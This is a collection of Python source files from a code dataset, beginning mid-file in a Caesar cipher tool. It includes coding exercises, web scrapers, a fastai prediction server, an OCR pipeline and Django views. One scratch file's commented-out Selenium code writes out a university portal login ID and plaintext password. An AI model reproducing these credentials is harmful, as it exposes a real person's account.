z\nfor i in range(26):\n caracteres.append(chr(i + 97))\n# Caracteres de 0 à 9\nfor i in range(10):\n caracteres.append(chr(i + 48))\n\n####################################### Argumentos #######################################################################\nparser = argparse.ArgumentParser(description='Cifra ou descifra uma mensagem') #container dos argumentos\n\n#adicionando argumentos\nparser.add_argument('-k', type=int, help= \"número a ser usado na codificação\")\nparser.add_argument('-i', '--input', type = str, help= 'nome do arquivo a cifrar / Descriptografar')\nparser.add_argument('-o', '--output', type = str, help= 'nome do arquivo de saida')\ngrupo = parser.add_mutually_exclusive_group() # O próprio nome diz,cria um grupo que é um argumento ou outro\ngrupo.add_argument('-c','--cifrar', action='store_true', help = 'cifra texto' )\ngrupo.add_argument('-d','--decifrar', action='store_true', help = 'descifra texto' )\n\n#lista de argumentos com todas as propriedades\nargs = parser.parse_args()\n\n#Relacionando argumentos\nk=args.k\nnome_do_texto = args.input\nsaida = args.output\n##################################### Funções de Cifrar e Descifrar respectivamente ###############################\n\ndef cifrar(nome_do_texto, k,saida):\n\n frase_criptografada = []\n\n with open(nome_do_texto, 'r+') as texto_aberto:\n c = texto_aberto.read(1)\n\n while len(c)>0:\n if c in caracteres:\n # se for 61 volta 
pro indice 0\n                x = caracteres[(caracteres.index(c) + k)%len(caracteres)]\n                c = texto_aberto.read(1)\n                frase_criptografada.append(x)\n            else:\n                c = texto_aberto.read(1)\n\n\n\n    with open(saida, 'w') as texto_criptografado:\n        for i in range(len(frase_criptografada)):\n            texto_criptografado.write(frase_criptografada[i])\n\n\ndef descifrar(nome_do_texto,k,saida):\n\n    lista_descriptografada = []\n\n    with open(nome_do_texto, 'r') as texto_cifrado:\n        c = texto_cifrado.read(1)\n\n        while len(c) > 0:\n            if c in caracteres:\n                # se for 61 volta pro indice 0\n                x = caracteres[(caracteres.index(c) - k) % len(caracteres)]\n                c = texto_cifrado.read(1)\n                lista_descriptografada.append(x)\n            else:\n                c = texto_cifrado.read(1)\n\n\n\n    with open(saida, 'w') as frase_descriptografada:\n        for i in range(len(lista_descriptografada)):\n            frase_descriptografada.write(lista_descriptografada[i])\n\n############################################ Seleção de Opções #################################################\nif(args.cifrar==False and args.decifrar== False ):\n    if (args.input is None):\n        nome_do_texto = input(\"digite o nome do arquivo a criptografar ou descriptografar\\n\")\n    if (args.k is None):\n        k = int(input(\"digite o valor da chave\\n\"))\n    if (args.output is None):\n        saida = input(\"Digite o nome do arquivo de saida\\n\")\n    while (True):\n        op = int(input(\"Digite\\n 1-Criptografar\\n 2-Descriptografar\\n\"))\n        if (op == 1):\n            cifrar(nome_do_texto,k,saida)\n            break\n        if (op ==2):\n            descifrar(nome_do_texto, k, saida)\n            break\n        else:\n            print(\"opção invalida\\n Reselecione a opção\")\n\nif(args.cifrar==True):\n    if(args.input is None):\n        nome_do_texto = input(\"digite o nome do arquivo a criptografar\\n\")\n    if (args.k is None):\n        k = int(input(\"digite o valor da chave\\n\"))\n    if (args.output is None):\n        saida = input(\"Digite o nome do arquivo de saida\\n\")\n    cifrar(nome_do_texto, k, saida)\nif(args.decifrar==True):\n    if (args.input is None):\n        nome_do_texto = input(\"digite o nome do arquivo a descriptografar\\n\")\n    if (args.k is None):\n        k = int(input(\"digite o valor da chave\\n\"))\n    if (args.output is None):\n        saida = input(\"Digite o nome do arquivo de saida\\n\")\n    descifrar(nome_do_texto, k, saida)\n\n\n\n\n\n\n\n\n","sub_path":"Cifradores e Analisadores de Frêquencia (Trabalho 1)/Cifrador_Cesar.py","file_name":"Cifrador_Cesar.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"447237471","text":"# Equilibrium index of an array\n# Equilibrium index of an array is an index such that the sum of elements at lower indexes is equal to the sum of elements at higher indexes.\n# For example, in an array A:\n# Input : A[] = {-7, 1, 5, 2, -4, 3, 0}\n# Output : 3\n# 3 is an equilibrium index, because:\n# A[0] + A[1] + A[2] = A[4] + A[5] + A[6]\n\ndef EqulibriumIndex(ary):\n\n    sum=0\n    left_sum=0\n\n    for i in range(0,len(ary)):\n        sum=sum+ary[i]\n\n    for i in range(0,len(ary)):\n\n        sum=sum-ary[i]\n        if left_sum==sum and i!=len(ary)-1:\n            return i\n        else:\n            left_sum=left_sum+ary[i]\n\n    return -1\n\ndef main():\n    \n    ary=[-7, 1, 5, 2, -4, 3, 6]\n    print(EqulibriumIndex(ary))\n\n    ary = [-7, 1, 5, 2, -4, 3, 0]\n    print(EqulibriumIndex(ary))\n\nif __name__=='__main__':\n    main()","sub_path":"python/CodingExercises/EqulibriumIndex.py","file_name":"EqulibriumIndex.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"375341697","text":"# 
coding=utf-8\nimport Tkinter\nimport tkMessageBox\n\ndef show():\n tkMessageBox.showinfo(title='aaa', message='bbb')\n\ndef creatfram():\n root = Tkinter.Tk()\n b = Tkinter.Button(root, text=\"关于\", command=show)\n b.pack()\n root.mainloop()\n\ncreatfram()","sub_path":"test/tt1.py","file_name":"tt1.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"63985213","text":"\"\"\"\n反转一个字符串中的元音字母\n\"\"\"\n\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n if len(s) == 0:return ''\n i, j = 0, len(s)-1\n v = ['a','e','i','o','u','A','E','I','O','U']\n ans = list(s)\n while j >= i:\n if ans[i] in v:\n if ans[j] in v:\n ans[i], ans[j] = ans[j], ans[i]\n i+=1\n j-=1\n else:\n j-=1\n else:\n i+=1\n return ''.join(ans)","sub_path":"python/0345.Reverse Vowels of a String.py","file_name":"0345.Reverse Vowels of a String.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589487796","text":"import csv\nfrom urllib.request import urlopen\nfrom urllib.parse import quote_plus\nfrom bs4 import BeautifulSoup\nimport os\nimport ShoppingUI\n\ndef crowlingShoppingList():\n global search\n url = f'https://msearch.shopping.naver.com/search/all?query={quote_plus(search)}'\n html = urlopen(url).read()\n global soup\n soup = BeautifulSoup(html,'html.parser')\n total = soup.select('._2TFfLkGZhc')\n global SearchList\n SearchList = []\n num=1\n for i in total:\n temp = []\n tagname = search+str(num)\n names = i.select('._3ldP-RMmbZ')\n name = names[0].text\n prices = i.select('._1vPmSw6Psr')\n price = prices[0].find(\"strong\").text + '원'\n url = soup.select('._1SwezRSbBH > a')[0]['href']\n\n urls = i.select('._2oDyaXK-qb')[0]\n siteURL = urls.get('href')\n if siteURL == None:\n siteURL = i.get('href')\n\n imageurls = i.select('._2oDyaXK-qb > img')[0]\n imgaeURL = imageurls.get('src')\n\n num += 1\n temp.append(tagname)\n temp.append(name)\n temp.append(price)\n temp.append(siteURL)\n temp.append(imgaeURL)\n SearchList.append(temp)\n\n\n\n#액셀 저장\ndef excelsavefile(search):\n try:\n if not os.path.exists(\"쇼핑리스트저장파일\"):\n os.makedirs(\"쇼핑리스트저장파일\")\n except:\n pass\n f = open(f'쇼핑리스트저장파일/{search}쇼핑리스트.csv','w', newline='')\n csvWriter = csv.writer(f)\n for i in SearchList:\n csvWriter.writerow(i)\n f.close()\n\n print(\"Excel_Save_Done!!\")\n #\n\n#이미지 저장\ndef imagesavefile(filename):\n foldername = f'{filename}이미지저장파일'\n try:\n if not os.path.exists(foldername):\n os.makedirs(foldername)\n except:\n pass\n images = soup.select('._2oDyaXK-qb > img')\n n=1\n for i in images:\n imgURL = i.attrs['src']\n with urlopen(imgURL) as f:\n with open(foldername+\"/\"+search + str(n)+ '.jpg', 'wb') as h:\n img = f.read()\n h.write(img)\n n += 1\n print('ImageDown_Done!!')","sub_path":"Project/CrowlingShoppingList.py","file_name":"CrowlingShoppingList.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"574508545","text":"from scrapy.selector import Selector\n\nclass Extractor:\n @staticmethod\n def push_chapter(chapters, itr, title, content):\n chapters.append({\n 'title': str(itr + 1) + '. 
' + title,\n 'content': content\n })\n @staticmethod\n def generate_tree(titles, lessons, own_chapters):\n ret = []\n tmp_chapter_title = None\n tmp_chapter_content = []\n abs_video_itr = 0\n chapter_itr = -1\n rel_video_itr = -1\n for x in own_chapters:\n # replace slash character in order to avoid creating new directory node\n x = x.replace('/', '-')\n cond1 = x != tmp_chapter_title and tmp_chapter_title is not None\n cond2 = tmp_chapter_title is None\n if cond1:\n Extractor.push_chapter(ret, chapter_itr, tmp_chapter_title, tmp_chapter_content)\n if cond1 or cond2:\n tmp_chapter_title = x\n tmp_chapter_content = []\n rel_video_itr=0\n chapter_itr+=1\n else:\n rel_video_itr+=1\n title = str(chapter_itr+1)\n title += '.'\n title += str(rel_video_itr+1)\n title += ' '\n title += titles[abs_video_itr]\n # replace slash character in order to avoid creating new directory node\n title = title.replace('/', '-')\n lesson = lessons[abs_video_itr]\n tmp_chapter_content.append({\n 'title': title,\n 'lesson': lesson\n })\n abs_video_itr+=1\n Extractor.push_chapter(ret, chapter_itr, tmp_chapter_title, tmp_chapter_content)\n return ret\n @staticmethod\n def extract_vimeo_permalink(session, lesson):\n selector = Selector(session.get(lesson, verify=True))\n node = '//iframe[@id=\"lessonPlayer\"]/@src'\n ret = selector.xpath(node).extract()[0]\n return ret\n @staticmethod\n def extract_course_metadata(session, course):\n response = session.get(course, verify=True)\n selector = Selector(response)\n playlist_tree = [\n 'div[@class=\"coursePageModulesList\"]',\n 'div[@class=\"listwrapper\"]'\n ]\n leaf_node_lesson_link_key = './/a/@href'\n leaf_node_title_key = './/a/text()'\n leaf_node_own_chapter_key = './/div[@class=\"comstatus\"]/@data-modname'\n xpath = '//'\n for x in playlist_tree:\n if xpath != '//':\n xpath += '/'\n xpath += x\n modules_list = selector.xpath(xpath)\n lessons = modules_list.xpath(leaf_node_lesson_link_key).extract()\n titles = modules_list.xpath(leaf_node_title_key).extract()\n own_chapters = modules_list.xpath(leaf_node_own_chapter_key).extract()\n\n course_title_tree = [\n 'div[@class=\"coursePageHeaderInfoTitle\"]',\n 'h1/text()'\n ]\n xpath = '//'\n\n for x in course_title_tree:\n if xpath != '//':\n xpath += '/'\n xpath += x\n\n course_title = selector.xpath(xpath).extract()[0]\n\n return {\n 'title': course_title,\n 'playlist': Extractor.generate_tree(titles, lessons, own_chapters)\n }","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"630902595","text":"# -*- coding: utf-8 -*-\nimport subprocess32\nimport tempfile\nimport shutil\nimport glob\nfrom os import path\n\nimport const\n\nclass Prepare:\n def _compile(self):\n print(' Compiling...')\n\n # Prepare\n self.tmpdir = tempfile.mkdtemp()\n source = path.join(self.tmpdir, 'source.txt')\n with open(source, 'w', newline='\\n') as f:\n f.write(self.ai['sourceCode'])\n\n # Compile\n target = path.join(self.tmpdir, 'client')\n simulatorPath = '../simulators/' + self.ai['name'] + '.py'\n cflags = ['python3', simulatorPath, source]\n child = subprocess32.Popen(cflags, stdout=subprocess32.PIPE, stderr=subprocess32.PIPE)\n try:\n self.compile_timeout = False\n self.compile_stdout, self.compile_stderr = child.communicate(timeout=10)\n except subprocess32.TimeoutExpired:\n self.compile_timeout = True\n self.compile_stdout = self.compile_stderr = \"Timeout\"\n with open(target, 'w', newline='\\n') as f:\n 
f.write(self.compile_stdout)\n return False\n\n self.compile_stdout = self.compile_stdout.decode('utf-8')\n self.compile_stderr = self.compile_stderr.decode('utf-8')\n with open(target, 'w', newline='\\n') as f:\n f.write(self.compile_stdout)\n\n exitcode = child.returncode\n if exitcode != 0:\n return False\n\n # Move client to the specific directory\n ai_name = 'ai_' + str(self.ai['_id'])\n self.abspath = path.join(const.AI_SAVE_DIRECTORY, ai_name)\n shutil.move(target, self.abspath)\n return True\n\n def _clean(self):\n shutil.rmtree(self.tmpdir)\n\n def __init__(self, ai):\n self.ai = ai\n\n def Run(self):\n result = { 'status': 'failure' }\n if not self._compile():\n if not self.compile_timeout:\n result['error'] = 'Simulation Failed. STDERR:\\n' + self.compile_stderr\n else:\n result['status'] = 'timeout'\n result['error'] = 'Simulation Timeout\\n'\n else:\n result['status'] = 'success'\n result['abspath'] = self.abspath\n result['info'] = self.compile_stdout + '\\n' + self.compile_stderr\n self._clean()\n return result\n","sub_path":"daemon/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"15986015","text":"import subprocess\nimport os\n\nclass PhpCs(object):\n \"\"\"\n Wraps the command line for \n phpcs\n \"\"\" \n def __init__(self, standard:'the standard to use when running the phpcs analysis'='PSR2'):\n php_cs = subprocess.Popen(['phpcs', '-i'], stdout=subprocess.PIPE)\n out, error = php_cs.communicate()\n if (out.find(standard.encode('utf-8')) == -1) and not os.path.isfile(standard):\n raise ValueError('The specified standard {0} is not installed'.format(standard))\n self._standard = standard\n\n def standard():\n doc = \"The standard property.\"\n def fget(self):\n return self._standard\n def fdel(self):\n del self._standard\n return locals()\n standard = property(**standard())\n\n def run(self, input:'the array of tuples (fileName, contents)'):\n \"\"\"\n Executes phpcs using the coding standard specified in the constructor\n and returns a string, with the stdout of the commmand\n if return code is 0, the stdout will be ''.\n \"\"\"\n outPut = ''\n returncode = 0\n\n for dataTuple in input:\n fileContents = dataTuple[1]\n fileName = dataTuple[0]\n if fileContents == \"\":\n outPut = outPut + fileName + \" is an empty file\"\n returncode = 1\n continue\n \n php_cs = subprocess.Popen(['phpcs', '--standard=' + self._standard], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = php_cs.communicate(input=dataTuple[1].encode('utf-8'))\n # If phpcs return code is greater than\n # 0 then that means that we had problem with one of the files\n # so we will return a non-zero error code \n if php_cs.returncode:\n returncode = 1\n errorCode = php_cs.returncode\n outString = out.decode('utf-8')\n outString = outString.replace('STDIN', dataTuple[0])\n outPut = outPut + outString\n return (returncode, outPut)\n","sub_path":"vomeron/php.py","file_name":"php.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492405352","text":"import aiohttp\nimport asyncio\nimport uvicorn\nfrom fastai import *\nfrom fastai.vision import *\nfrom io import BytesIO\nfrom starlette.applications import Starlette\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles 
import StaticFiles\n\n\nexport_one_pad_file_url = 'https://drive.google.com/uc?export=download&id=16QyNnQEDZl6y3uDVxCSQ_AwrF67_Jahs'\nexport_one_pad_file_name = 'resnet50_one_pad_87_acc_6_june.pkl'\n\nexport_two_pads_file_url = 'https://drive.google.com/uc?export=download&id=1KpYllvvVCLiXRsCck14aXn-O808ZKA8r'\nexport_two_pads_file_name = 'resnet50_81_acc_29_may_2019.pkl'\n\nexport_uric_acid_file_url = 'https://drive.google.com/uc?export=download&id=1pDknKzHPeS93CCtZnwZEorzcodmFXclP'\nexport_uric_acid_file_name = 'resnet50_UA_89_acc_20_june_2019.pkl'\n\npath = Path(__file__).parent\n\nmodels_path = path / \"models\"\n\none_pad_model_path = models_path / \"one_pad_model\"\ntwo_pads_model_path = models_path / \"two_pads_model\"\nuric_acid_model_path = models_path / \"uric_acid_model\"\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\n\n# Ensure the dir exists at the current path.\ndef ensure_dir(dir_name):\n if not os.path.exists(dir_name):\n os.mkdir(dir_name, mode=0o777)\n print('Created %s directory' % dir_name)\n\nasync def download_file(url, dest):\n if dest.exists():\n print(\"File already exists.\")\n return\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n data = await response.read()\n with open(dest, 'wb') as f:\n f.write(data)\n\n\nasync def setup_one_pad_learner():\n print('Start downloading one pad model.')\n await download_file(export_one_pad_file_url, one_pad_model_path / export_one_pad_file_name)\n try:\n learn = load_learner(one_pad_model_path, export_one_pad_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\n\nasync def setup_two_pad_learner():\n print('Start downloading two pad model.')\n await download_file(export_two_pads_file_url, two_pads_model_path / export_two_pads_file_name)\n try:\n learn = load_learner(two_pads_model_path, export_two_pads_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\nasync def setup_uric_acid_learner():\n print('Start downloading uric acid model.')\n await download_file(export_uric_acid_file_url, uric_acid_model_path / export_uric_acid_file_name)\n try:\n learn = load_learner(uric_acid_model_path, export_uric_acid_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n 
raise\n\nensure_dir(one_pad_model_path)\nensure_dir(two_pads_model_path)\nensure_dir(uric_acid_model_path)\n\nloop = asyncio.get_event_loop()\n\ntasks = [asyncio.ensure_future(setup_one_pad_learner())]\n\none_pad_model = loop.run_until_complete(asyncio.gather(*tasks))[0]\n\ntasks = [asyncio.ensure_future(setup_two_pad_learner())]\n\ntwo_pad_model = loop.run_until_complete(asyncio.gather(*tasks))[0]\n\ntasks = [asyncio.ensure_future(setup_uric_acid_learner())]\n\nuric_acid_model = loop.run_until_complete(asyncio.gather(*tasks))[0]\n\nloop.close()\n\n\n@app.route('/')\nasync def homepage(request):\n html_file = path / 'view' / 'index.html'\n return HTMLResponse(html_file.open().read())\n\n\n@app.route('/analyze_two_pads', methods=['POST'])\nasync def analyze_two_pads(request):\n print('analyze_two_pads call')\n img_data = await request.form()\n img_bytes = await(img_data['file'].read())\n img = open_image(BytesIO(img_bytes))\n prediction = two_pad_model.predict(img)[0]\n return JSONResponse({'result': str(prediction)})\n\n\n@app.route('/analyze_one_pad', methods=['POST'])\nasync def analyze_one_pad(request):\n print('analyze_one_pad call')\n img_data = await request.form()\n img_bytes = await(img_data['file'].read())\n img = open_image(BytesIO(img_bytes))\n prediction = one_pad_model.predict(img)[0]\n return JSONResponse({'result': str(prediction)})\n\n\n@app.route('/analyze_uric_acid_strip', methods=['POST'])\nasync def analyze_uric_acid_strip(request):\n print('analyze_uric_acid_strip call')\n img_data = await request.form()\n img_bytes = await(img_data['file'].read())\n img = open_image(BytesIO(img_bytes))\n prediction = uric_acid_model.predict(img)[0]\n return JSONResponse({'result': str(prediction)})\n\n\nif __name__ == '__main__':\n if 'serve' in sys.argv:\n uvicorn.run(app=app, host='0.0.0.0', port=5000, log_level=\"info\")\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"456233108","text":"import pickle\nimport requests\nimport urllib.request\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport re\n\n# driver = webdriver.Chrome()\n# driver = webdriver.PhantomJS()\n# driver.get('http://idas.uestc.edu.cn/authserver/login?service=http%3A%2F%2Fportal.uestc.edu.cn%2F')\n\n# username = driver.find_element_by_name('username')\n# password = driver.find_element_by_name('password')\n\n# username.send_keys('2015060103012')\n# password.send_keys('101387')\n# password.send_keys(Keys.RETURN)\n\n# cookies = driver.get_cookies()\n# for cookie in cookies:\n# \tprint(cookie)\n\n# pickle.dump(cookies, open('uestc.cookie', 'wb'))\n\n# driver = webdriver.Chrome()\n# cookies = pickle.load(open('uestc.cookie', 'rb'))\n# for cookie in cookies:\n# \tdriver.add_cookie(cookie)\n\n# driver.get('http://portal.uestc.edu.cn/?.pn=p346')\n# cookies = driver.get_cookies()\n# for cookie in cookies:\n# \tprint(cookie)\n\n# cookies = pickle.load(open('uestc.cookie', 'rb'))\n\n# s = requests.Session()\n# for cookie in cookies:\n# \ts.cookies.set(cookie['name'], cookie['value'])\n# response = s.get('http://portal.uestc.edu.cn/?.pn=p346')\n# html = response.text\n# print(html)\n\n# with open('uestc.html', 'w') as f:\n# \tf.write(response.text)\n\n# cookies = pickle.load(open('uestc.cookie', 'rb'))\n# # for cookie in cookies:\n# # \tprint(cookie)\n\n# request = urllib.request.Request('http://portal.uestc.edu.cn/?.pn=p346')\n# response = 
urllib.request.urlopen(request)\n\n# print(response.read().decode('utf-8'))\n\n# string = '怎样才能不劳而获'\n\n# print(string)\n# print(string)\n# string = string.decode('gbk')\n# print(string)\n# with open('test.txt', 'a') as f:\n# \tf.write(string)\n\n# driver = webdriver.Chrome()\n# driver.get('http://portal.uestc.edu.cn/?.pn=p346')\n# username = driver.find_element_by_id('username')\n# password = driver.find_element_by_id('password')\n\n# username.send_keys('2015060103012')\n# password.send_keys('101387')\n# password.send_keys(Keys.RETURN)\n\n##################################################\n# import urllib.request\n\n# url = 'http://www.baidu.com'\n\n# print('===============first')\n# response1 = urllib.request.urlopen(url)\n# print(response1.getcode())\n# print(len(response1.read().decode('utf-8')))\n\n# print('===============second')\n# request = urllib.request.Request(url)\n# response2 = urllib.request.urlopen(request)\n# print(response2.getcode())\n# # print(response2.read().decode('utf-8'))\n# print(len(response2.read().decode('utf-8')))\n\n# print('===============third')\n# import http.cookiejar\n# cj = http.cookiejar.LWPCookieJar()\n# # cj = http.cookiejar.MozillaCookieJar()\n# # cj = http.cookiejar.FileCookieJar()\n# opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))\n# # request = opener.urlopen(url)\n# response3 = opener.open(url)\n# print(cj)\n# print(response3.getcode())\n# # print(response3.read().decode('utf-8'))\n# print(len(response3.read().decode('utf-8')))\n\nfrom bs4 import BeautifulSoup\n\nhtml_doc = \"\"\"\n<html><head><title>The Dormouse's story</title></head>\n<body>\n<p class=\"title\"><b>The Dormouse's story</b></p>\n\n<p class=\"story\">Once upon a time there were three little sisters; and their names were\n<a href=\"http://example.com/elsie\" class=\"sister\" id=\"link1\">Elsie</a>,\n<a href=\"http://example.com/lacie\" class=\"sister\" id=\"link2\">Lacie</a> and\n<a href=\"http://example.com/tillie\" class=\"sister\" id=\"link3\">Tillie</a>;\nand they lived at the bottom of a well.</p>\n\n<p class=\"story\">...</p>
\n\"\"\"\n\nsoup = BeautifulSoup(html_doc,'html.parser')\n# all_a = soup.find_all('a')\n# for a in all_a:\n# \tprint(a.get_text())\n\nprint('=================get all the link')\nlinks = soup.find_all('a')\nfor link in links:\n\tprint(link.name, link['href'], link.get_text())\n\nprint('=================get the lacie') \nlacie = soup.find('a', id = 'link2')\nprint(lacie.name, lacie['href'], lacie.get_text())\n\nprint('=================get the lacie by regular')\nlacie = soup.find('a', href = re.compile(r'ill'))\nprint(lacie.name, lacie['href'], lacie.get_text())\n\nprint('=================get the p')\np_node = soup.find('p', class_ = 'title')\nprint(p_node.name, p_node.get_text())","sub_path":"LearnCode/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"304930801","text":"from multiprocessing import Process, Queue\nimport time\nimport random\n\n\ndef put_num(q):\n for i in range(5):\n q.put(i)\n print('得到数据--', i)\n time.sleep(random.random())\n\n\ndef get_num(q):\n while True:\n if not q.empty():\n data = q.get(True)\n print('取出数据-----', data)\n time.sleep(random.random())\n else:\n break\n\n\ndef main():\n q = Queue()\n t2 = Process(target=get_num, args=(q, ))\n t1 = Process(target=put_num, args=(q, ))\n t1.start()\n t1.join()\n\n t2.start()\n t2.join()\n print('')\n print(\"已全部读写完毕\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"1-进程间通信-Queue.py","file_name":"1-进程间通信-Queue.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"135735587","text":"from typing import Tuple, List\n\ndef main()->None:\n # ヒント見たけど参考にしてない\n N, x = map(int, input().split())\n a:List[int] = list(map(int, input().split()))\n sorted_a:List[int] = sorted(a) # 小さい順にならべる\n count:int = 0 # 何回配ったか\n for d in sorted_a:\n x -= d\n if x < 0: # 持ってた量が配る総量より少なかった時\n break\n count += 1\n # ちょうど配れない、必要な量より多く持ってた時はおおもらう人が出てくる。\n # 幸福人数の最大を求めればいいから余りを全部一人にあげればいいから−1\n if x > 0:\n print(count-1)\n else: # ちょうどの時はcount=N,持ってた量が配る総量より少なかった時は配れた人数\n print(count)\n\nif __name__ == \"__main__\":\n main()","sub_path":"python/ABC_50/ABC_027/A_CandyDistributionAgain 2.py","file_name":"A_CandyDistributionAgain 2.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"497151403","text":"import dataset_generator as dataset\nimport numpy as np\nimport os\n\n\nclass pipeline2:\n\n\tdef __init__(self, cut_classifier, ocr_classifier, classes=dataset.ALPHABET_ALL ):\n\t\tself._classes = classes\n\t\tself._cut_classifier = cut_classifier\n\t\tself._ocr_net = ocr_classifier\n\n\n\t# Return a list of tuples where the index i of the list represent the prediction\n\t# for the i-th value. Each tuple contains a boolean, True if is a good cut False otherwise,\n\t# and contains a list that is the ranking of the prediction for each letter. 
\n\t# es: [(False, []), (True, [(\"s_alta\",90%),(\"a\", 10%),...(\"z\", 0%)])]\n\tdef predict(self, X_test, verbose=0):\n\t\tprediction_cuts = self._cut_classifier.predict(X_test, verbose=verbose)\n\n\t\tindex_good_letters = []\n\n\t\tfor i,(_,prob_letter) in enumerate(prediction_cuts):\n\t\t\tif prob_letter>=0.5:\n\t\t\t\tindex_good_letters.append(i)\n\n\t\tX_test = np.array(X_test)\n\t\tX_test_ocr = X_test[index_good_letters]\n\t\tprediction_ocr = self._ocr_net.predict(X_test_ocr)\n\n\t\tprediction = []\n\n\t\tocr_i = 0;\n\n\t\tfor i,_ in enumerate(X_test):\n\t\t\tif not i in index_good_letters:\n\t\t\t\tprediction.append((False, []))\n\t\t\telse:\n\t\t\t\tsorted_indexes = (-prediction_ocr[ocr_i]).argsort()[:3]\n\t\t\t\tranking = [(self._classes[j], prediction_ocr[ocr_i][j]*100) for j in sorted_indexes]\n\t\t\t\tdt = np.dtype([('letters', np.str_, 16), ('grades', np.float64)])\n\t\t\t\tranking = np.array(ranking, dtype=dt)\n\t\t\t\tprediction.append((True, ranking))\n\t\t\t\tocr_i += 1\n\n\t\treturn prediction\n\n\n\n\n\n\n","sub_path":"Notebooks/pipeline2.py","file_name":"pipeline2.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"522507018","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, Http404\nfrom django.template import loader\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.utils import timezone\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom .models import Profile, Ticket, Competition\nfrom .forms import ProfileEditForm, NameChangeForm\nfrom competition.models import Participant\nimport logging\n\ng_logger = logging.getLogger(__name__)\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n user_form = NameChangeForm(request.POST, instance=request.user)\n profile_form = ProfileEditForm(request.POST, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n # messages.success(request, _('Your profile was successfully updated!'))\n return redirect('member:profile')\n # else:\n # messages.error(request, _('Please correct the error below.'))\n else:\n user_form = NameChangeForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n\n template = loader.get_template('profile.html')\n current_site = get_current_site(request)\n context = {\n 'profile': request.user.profile,\n 'site_name': current_site.name,\n 'user_form': user_form,\n 'profile_form': profile_form,\n }\n return HttpResponse(template.render(context, request))\n\n\n@login_required\ndef use_token(request):\n if request.method == 'POST':\n try:\n token = request.POST['token'].upper()\n ticket = Ticket.objects.get(used=False, token=token)\n ticket.used = True\n g_logger.debug(\"Found ticket for token:%s\" % token)\n tourn = ticket.competition.tournament\n try:\n participant = Participant.objects.get(user=request.user,\n tournament=tourn)\n except Participant.DoesNotExist:\n participant = Participant(user=request.user,\n tournament=tourn)\n participant.save()\n ticket.competition.participants.add(participant)\n ticket.save()\n return redirect('competition:org_table',\n tour_name=tourn.name,\n org_name=ticket.competition.organisation.name)\n 
